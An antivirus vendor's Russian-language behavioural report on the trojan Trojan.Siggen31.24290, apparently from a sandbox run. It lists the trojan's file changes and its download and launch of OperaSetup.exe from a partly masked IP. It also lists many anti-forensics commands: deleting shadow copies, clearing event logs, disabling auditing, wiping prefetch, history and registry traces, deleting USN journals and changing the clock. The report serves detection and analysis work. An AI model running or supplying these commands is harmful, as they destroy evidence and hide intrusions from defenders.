Trojan.Siggen31.24290

Техническая информация

Вредоносные функции

Для затруднения выявления своего присутствия в системе

удаляет теневые копии разделов.

Запускает на исполнение

'<SYSTEM32>\net.exe' stop pcasvc
'<SYSTEM32>\net.exe' stop DPS

Запускает большое число процессов

Изменения в файловой системе

Создает следующие файлы

%HOMEPATH%\desktop\operasetup.exe
<Текущая директория>\temp1.txt
<Текущая директория>\temp2.txt
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\tze5c09o\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\42yihn1e\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\kqvpqpcd\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\23dx3w26\desktop.ini
%APPDATA%\microsoft\windows\cookies\desktop.ini
%LOCALAPPDATA%\microsoft\windows\history\history.ie5\mshist012022010720220108\index.dat
%APPDATA%\microsoft\windows\iecompatcache\index.dat
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\antiphishing\2cedbfbc-dba8-43aa-b1fd-cc8e6316e3e2.dat

Удаляет следующие файлы

<Текущая директория>\temp1.txt
%WINDIR%\prefetch\setup.exe-f9915f9f.pf
%WINDIR%\prefetch\setuputility.exe-81395de3.pf
%WINDIR%\prefetch\setx.exe-a7e52bf4.pf
%WINDIR%\prefetch\shutdown.exe-e7d5c9cc.pf
%WINDIR%\prefetch\sppsvc.exe-b0f8131b.pf
%WINDIR%\prefetch\steamservice.exe-57e215d3.pf
%WINDIR%\prefetch\steamsetup_2.10.91.91.exe-91d3eed3.pf
%WINDIR%\prefetch\svchost.exe-007fea55.pf
%WINDIR%\prefetch\svchost.exe-05f624ab.pf
%WINDIR%\prefetch\svchost.exe-7cfedea3.pf
%WINDIR%\prefetch\taskhost.exe-7238f31d.pf
%WINDIR%\prefetch\thunderbird setup 78.9.1 (x64-07c878f8.pf
%WINDIR%\prefetch\thunderbird.exe-5119524c.pf
%WINDIR%\prefetch\trustedinstaller.exe-3cc531e5.pf
%WINDIR%\prefetch\tsetup.1.4.3.exe-ef3d6f27.pf
%WINDIR%\prefetch\setup.exe-ea68f294.pf
%WINDIR%\prefetch\tsetup.1.4.3.tmp-d1aa1547.pf
%WINDIR%\prefetch\setup.exe-d498d406.pf
%WINDIR%\prefetch\setup.exe-7c026c7f.pf
%WINDIR%\prefetch\rundll32.exe-860c49a4.pf
%WINDIR%\prefetch\rundll32.exe-db187fd1.pf
%WINDIR%\prefetch\rundll32.exe-e6258edf.pf
%WINDIR%\prefetch\runonce.exe-0e293dd6.pf
%WINDIR%\prefetch\runonce.exe-d0649312.pf
%WINDIR%\prefetch\sc.exe-945d79ae.pf
%WINDIR%\prefetch\searchfilterhost.exe-77482212.pf
%WINDIR%\prefetch\searchindexer.exe-4a6353b9.pf
%WINDIR%\prefetch\searchprotocolhost.exe-0cb8cade.pf
%WINDIR%\prefetch\servicemodelreg.exe-1f42b3e3.pf
%WINDIR%\prefetch\servicemodelreg.exe-afddd121.pf
%WINDIR%\prefetch\setup.exe-04541c92.pf
%WINDIR%\prefetch\setup.exe-0a445b9b.pf
%WINDIR%\prefetch\setup.exe-45dc58c7.pf
%WINDIR%\prefetch\setup.exe-77fe9137.pf
%WINDIR%\prefetch\setup.exe-b4850df7.pf
%WINDIR%\prefetch\uninstall.exe-a11d6b07.pf
%WINDIR%\prefetch\unlodctr.exe-531facc7.pf
%WINDIR%\prefetch\unlodctr.exe-a3d4deeb.pf
%WINDIR%\prefetch\vc_redist.x86.exe-e8257b7c.pf
%WINDIR%\prefetch\vssvc.exe-b8afc319.pf
%WINDIR%\prefetch\wermgr.exe-0f2ac88c.pf
%WINDIR%\prefetch\wevtutil.exe-400d93e8.pf
%WINDIR%\prefetch\wevtutil.exe-ef5861c4.pf
%WINDIR%\prefetch\winrar-x64-531.exe-91d4b934.pf
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\604pwz7f\operasetup[1].exe
%WINDIR%\prefetch\wmiadap.exe-f8dfdfa2.pf
%WINDIR%\prefetch\wuauclt.exe-70318591.pf
%WINDIR%\prefetch\wusa.exe-a8d5906c.pf
%WINDIR%\prefetch\wusa.exe-f04b35c8.pf
%WINDIR%\prefetch\xcopy.exe-41e6513f.pf
%WINDIR%\prefetch\readyboot\trace1.fx
%WINDIR%\prefetch\readyboot\trace2.fx
%WINDIR%\prefetch\vc_redist.x86.exe-92eb15bb.pf
%WINDIR%\prefetch\vc_redist.x86.exe-d6410970.pf
%WINDIR%\prefetch\vc_redist.x86.exe-4da5e6b3.pf
%WINDIR%\prefetch\vc_redist.x86.exe-35b8af5d.pf
%WINDIR%\prefetch\vc_redist.x86.exe-1dcb7807.pf
%WINDIR%\prefetch\vcredist_x64.exe-24aea5d8.pf
%WINDIR%\prefetch\vcredist_x64.exe-8227a7ef.pf
%WINDIR%\prefetch\vcredist_x64.exe-a53f124b.pf
%WINDIR%\prefetch\vcredist_x86.exe-163efd5c.pf
%WINDIR%\prefetch\vcredist_x86.exe-73b7ff73.pf
%WINDIR%\prefetch\vcredist_x86.exe-96cf69cf.pf
%WINDIR%\prefetch\rundll32.exe-7438e4d5.pf
%WINDIR%\prefetch\vc_redist.x64.exe-2c3b2083.pf
%WINDIR%\prefetch\vcredist_x86.exe-c622f3ef.pf
%WINDIR%\prefetch\vc_redist.x64.exe-5c158f2f.pf
%WINDIR%\prefetch\vc_redist.x64.exe-89c170f2.pf
%WINDIR%\prefetch\vc_redist.x64.exe-b0c890fd.pf
%WINDIR%\prefetch\vc_redist.x64.exe-c0cd3f70.pf
%WINDIR%\prefetch\vc_redist.x64.exe-d3a3c549.pf
%WINDIR%\prefetch\vc_redist.x86.exe-1c5672a5.pf
%WINDIR%\prefetch\unpack200.exe-bb96da5f.pf
%WINDIR%\prefetch\vc_redist.x64.exe-442857d9.pf
%WINDIR%\prefetch\wmiprvse.exe-1628051c.pf
%WINDIR%\prefetch\rundll32.exe-36dac103.pf
%WINDIR%\prefetch\ose.exe-51c16f0e.pf
%WINDIR%\prefetch\agrobust.db
%WINDIR%\prefetch\aspnet_regiis.exe-75651a3c.pf
%WINDIR%\prefetch\aspnet_regiis.exe-86915b5a.pf
%WINDIR%\prefetch\bcssync.exe-3f6c64a2.pf
%WINDIR%\prefetch\bfsvc.exe-9c7a4dee.pf
%WINDIR%\prefetch\bspatch.exe-dd9e5e46.pf
%WINDIR%\prefetch\chrome.exe-5617a1bf.pf
%WINDIR%\prefetch\clrgc.exe-5d5b90f5.pf
%WINDIR%\prefetch\cmd.exe-4a81b364.pf
%WINDIR%\prefetch\cmd.exe-ac113aa8.pf
%WINDIR%\prefetch\conhost.exe-1f3e9d7e.pf
%WINDIR%\prefetch\default-browser-agent.exe-01c82e17.pf
%WINDIR%\prefetch\dllhost.exe-5e46fa0d.pf
%WINDIR%\prefetch\dllhost.exe-766398d2.pf
%WINDIR%\prefetch\dllhost.exe-b2eb1806.pf
%WINDIR%\prefetch\agglglobalhistory.db
%WINDIR%\prefetch\dotnetfx35.exe-852dd91f.pf
%WINDIR%\prefetch\agglfgapphistory.db
%WINDIR%\prefetch\agapplaunch.db
<Текущая директория>\temp3.txt
%WINDIR%\temp\dmi3ddf.tmp
%WINDIR%\temp\fwtsqmfile00.sqm
%WINDIR%\temp\fwtsqmfile01.sqm
%WINDIR%\temp\ts_20dd.tmp
%WINDIR%\temp\ts_235f.tmp
%WINDIR%\temp\ts_23ec.tmp
%WINDIR%\temp\ts_2862.tmp
%WINDIR%\temp\ts_2b9f.tmp
%WINDIR%\temp\ts_2da4.tmp
%WINDIR%\temp\ts_2eed.tmp
%WINDIR%\temp\ts_3595.tmp
%WINDIR%\temp\ts_3622.tmp
%WINDIR%\prefetch\42.0.2311.135_chrome_installe-7fd75326.pf
%WINDIR%\prefetch\acrordrdc1501020056_en_us.exe-3b58c109.pf
%WINDIR%\prefetch\agglfaulthistory.db
%WINDIR%\prefetch\dotnetfx35setup.exe-506819a6.pf
%WINDIR%\prefetch\dotnetfx40_full_x86_x64.exe-d34ac1bf.pf
%WINDIR%\prefetch\drvinst.exe-4cb4314a.pf
%WINDIR%\prefetch\ndp48-x86-x64-allos-enu.exe-54656820.pf
%WINDIR%\prefetch\netsh.exe-f1b6da12.pf
%WINDIR%\prefetch\ngen.exe-ae594a6b.pf
%WINDIR%\prefetch\ngen.exe-ec3f9239.pf
%WINDIR%\prefetch\ntosboot-b00dfaad.pf
%WINDIR%\prefetch\opera_29.0.1795.47_setup.exe-839f60fd.pf
%WINDIR%\prefetch\regtlibv12.exe-d3a27e55.pf
%WINDIR%\prefetch\opera_29.0.1795.47_setup.exe-9c628850.pf
%WINDIR%\prefetch\ose00000.exe-2a4efdbf.pf
%WINDIR%\prefetch\pfsvperfstats.bin
%WINDIR%\prefetch\ping.exe-7e94e73e.pf
%WINDIR%\prefetch\rdrservicesupdater.exe-3d26e665.pf
%WINDIR%\prefetch\regsvr32.exe-8461dbee.pf
%WINDIR%\prefetch\regtlibv12.exe-b7c4f383.pf
%WINDIR%\prefetch\msiexec.exe-a2d55cb6.pf
%WINDIR%\prefetch\msiexec.exe-e09a077a.pf
%WINDIR%\prefetch\mscorsvw.exe-c3c515bd.pf
%WINDIR%\prefetch\mscorsvw.exe-90526fac.pf
%WINDIR%\prefetch\mscorsvw.exe-57d17daf.pf
%WINDIR%\prefetch\firefox.exe-a606b53c.pf
%WINDIR%\prefetch\ie4uinit.exe-8b333e8b.pf
%WINDIR%\prefetch\install.exe-3b270e29.pf
%WINDIR%\prefetch\installer.exe-58ba519f.pf
%WINDIR%\prefetch\installer.exe-6c3ab888.pf
%WINDIR%\prefetch\jaureg.exe-2358f266.pf
%WINDIR%\prefetch\rundll32.exe-038e6267.pf
%WINDIR%\prefetch\javaws.exe-ed58c697.pf
%WINDIR%\prefetch\javaw.exe-dccf0ab8.pf
%WINDIR%\prefetch\jre-8u45-windows-x64.exe-61cc34b3.pf
%WINDIR%\prefetch\lodctr.exe-3cce0534.pf
%WINDIR%\prefetch\lodctr.exe-72cd50d0.pf
%WINDIR%\prefetch\mofcomp.exe-8fe3d558.pf
%WINDIR%\prefetch\mofcomp.exe-fde76efc.pf
%WINDIR%\prefetch\mscorsvw.exe-245ed79e.pf
%WINDIR%\prefetch\firefox setup 78.0.2 (x64).ex-d6c4efe8.pf
%WINDIR%\prefetch\jp2launcher.exe-7dccd1b9.pf
%LOCALAPPDATA%\microsoft\windows\history\history.ie5\mshist012022010720220108\index.dat

Перемещает следующие файлы

<Текущая директория>\temp2.txt в <Текущая директория>\temp3.txt

Изменяет следующие файлы

Подменяет следующие файлы

%LOCALAPPDATA%\Microsoft\Windows\<INETFILES>\Content.IE5\desktop.ini
%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5\desktop.ini

Сетевая активность

Подключается к

'18#.#36.228.154':3000

TCP

Запросы HTTP GET

http://18#.###.228.154:3000/OperaSetup.exe via 18#.#36.228.154

Другое

Создает и запускает на исполнение

'%HOMEPATH%\desktop\operasetup.exe'

Запускает на исполнение

'<SYSTEM32>\cmd.exe' /c auditpol /set /category:"System" /success:disable /failure:disable
'<SYSTEM32>\wevtutil.exe' cl "Microsoft-Windows-PowerShell/Operational"
'<SYSTEM32>\cmd.exe' /c wevtutil cl "Microsoft-Windows-PowerShell/Operational"
'<SYSTEM32>\wevtutil.exe' cl "Windows PowerShell"
'<SYSTEM32>\cmd.exe' /c wevtutil cl "Windows PowerShell"
'<SYSTEM32>\cmd.exe' /c del "%APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" /f /q
'<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache" /f
'<SYSTEM32>\cmd.exe' /c reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache" /f
'<SYSTEM32>\cmd.exe' /c reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist" /f
'<SYSTEM32>\cmd.exe' /c reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
'<SYSTEM32>\cmd.exe' /c del /s /f /q %WINDIR%\Prefetch\*.*
'<SYSTEM32>\cmd.exe' /c del /s /f /q %WINDIR%\temp\*.*
'<SYSTEM32>\cmd.exe' /c del /q /f /s "C:\Users\%USERNAME%\AppData\Local\Temp\*"
'<SYSTEM32>\cmd.exe' /c del /f /q C:\license.fss
'<SYSTEM32>\cmd.exe' /c del /f /q "%WINDIR%\IME\*.dll"
'<SYSTEM32>\sc.exe' stop DiagTrack
'<SYSTEM32>\reg.exe' delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist" /f
'<SYSTEM32>\cmd.exe' /c del C:\Users\%USERNAME%\Desktop\imgui.ini
'<SYSTEM32>\reg.exe' delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
'<SYSTEM32>\rundll32.exe' InetCpl.cpl,ClearMyTracksByProcess 255
'<SYSTEM32>\cmd.exe' /c RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "Clear-History"
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Clear-History"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "Clear-EventLog 'Microsoft-Windows-PowerShell/Operational'"
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Clear-EventLog 'Microsoft-Windows-PowerShell/Operational'"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "Clear-EventLog 'Windows PowerShell'"
'<SYSTEM32>\cmd.exe' /c sc stop DiagTrack && sc start DiagTrack
'<SYSTEM32>\cmd.exe' /c del %WINDIR%\Prefetch\*.pf /Q
'<SYSTEM32>\cmd.exe' /c powershell -Command "Clear-History"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Clear-EventLog 'Microsoft-Windows-PowerShell/Operational'"
'<SYSTEM32>\cmd.exe' /c powershell -Command "Clear-EventLog 'Microsoft-Windows-PowerShell/Operational'"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Clear-EventLog 'Windows PowerShell'"
'<SYSTEM32>\cmd.exe' /c powershell -Command "Clear-EventLog 'Windows PowerShell'"
'<SYSTEM32>\cmd.exe' /c del /s /q %WINDIR%\Temp\*
'<SYSTEM32>\cmd.exe' /c del /s /q %TEMP%\*
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Clear-History"
'<SYSTEM32>\cmd.exe' /c del /q "%APPDATA%\Microsoft\Windows\Recent\*"
'<SYSTEM32>\net1.exe' start DPS
'<SYSTEM32>\net.exe' start DPS
'<SYSTEM32>\net1.exe' stop DPS
'<SYSTEM32>\cmd.exe' /c echo test > temp1.txt
'<SYSTEM32>\wevtutil.exe' el
'<SYSTEM32>\cmd.exe' /c wevtutil el
'<SYSTEM32>\cmd.exe' /c del temp3.txt
'<SYSTEM32>\cmd.exe' /c move temp2.txt temp3.txt
'<SYSTEM32>\cmd.exe' /c del /f /q "C:\Users\%USERNAME%\AppData\Roaming\discord\Local Storage\leveldb\updater.exe"
'<SYSTEM32>\cmd.exe' /c del temp1.txt
'%ProgramFiles%\internet explorer\iexplore.exe' -ResetDestinationList
'<SYSTEM32>\wevtutil.exe' cl Application
'<SYSTEM32>\fsutil.exe' usn deletejournal /d D
'<SYSTEM32>\cmd.exe' /c fsutil usn deletejournal /d D
'<SYSTEM32>\fsutil.exe' usn deletejournal /d C
'<SYSTEM32>\cmd.exe' /c fsutil usn deletejournal /d C
'<SYSTEM32>\cmd.exe' /c time 12:53:50
'<SYSTEM32>\cmd.exe' /c date 01-07-2022
'<SYSTEM32>\auditpol.exe' /set /category:"System" /success:disable /failure:disable
'<SYSTEM32>\cmd.exe' /c echo test > temp2.txt
'<SYSTEM32>\cmd.exe' /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Clear-EventLog 'Windows PowerShell'"
'<SYSTEM32>\cmd.exe' /c wevtutil cl System
'<SYSTEM32>\wevtutil.exe' cl Security
'<SYSTEM32>\wevtutil.exe' cl System
'<SYSTEM32>\cmd.exe' /c net stop DPS && net start DPS
'<SYSTEM32>\net1.exe' stop pcasvc
'<SYSTEM32>\cmd.exe' /c net stop pcasvc && net start pcasvc
'<SYSTEM32>\cmd.exe' /c del /f /q "%WINDIR%\IME\auth.json"
'<SYSTEM32>\cmd.exe' /c del /f /q C:\license.fresh
'<SYSTEM32>\cmd.exe' /c del /f /q %ProgramFiles%\Epic Games\GTAV\imgui.ini
'<SYSTEM32>\cmd.exe' /c wevtutil cl Security
'<SYSTEM32>\cmd.exe' /c del /f /q "%ProgramFiles%\Epic Games\GTAV\imgui.ini"
'<SYSTEM32>\cmd.exe' /c wevtutil cl Application
'<SYSTEM32>\cmd.exe' /c del C:\Users\%USERNAME%\Desktop\settings.cock
'<SYSTEM32>\cmd.exe' /c del C:\Users\%USERNAME%\Desktop\packages.json
'<SYSTEM32>\auditpol.exe' /set /category:"System" /success:enable /failure:enable
'<SYSTEM32>\cmd.exe' /c auditpol /set /category:"System" /success:enable /failure:enable
'<SYSTEM32>\w32tm.exe' /resync
'<SYSTEM32>\cmd.exe' /c w32tm /resync
'<SYSTEM32>\cmd.exe' /c del /f /q C:\license.flk
'<SYSTEM32>\cmd.exe' /c vssadmin delete shadows /all /quiet

Технологии

Термины

Обучение и просвещение

Мифы

Техническая информация

Рекомендации по лечению

Демо бесплатно на 14 дней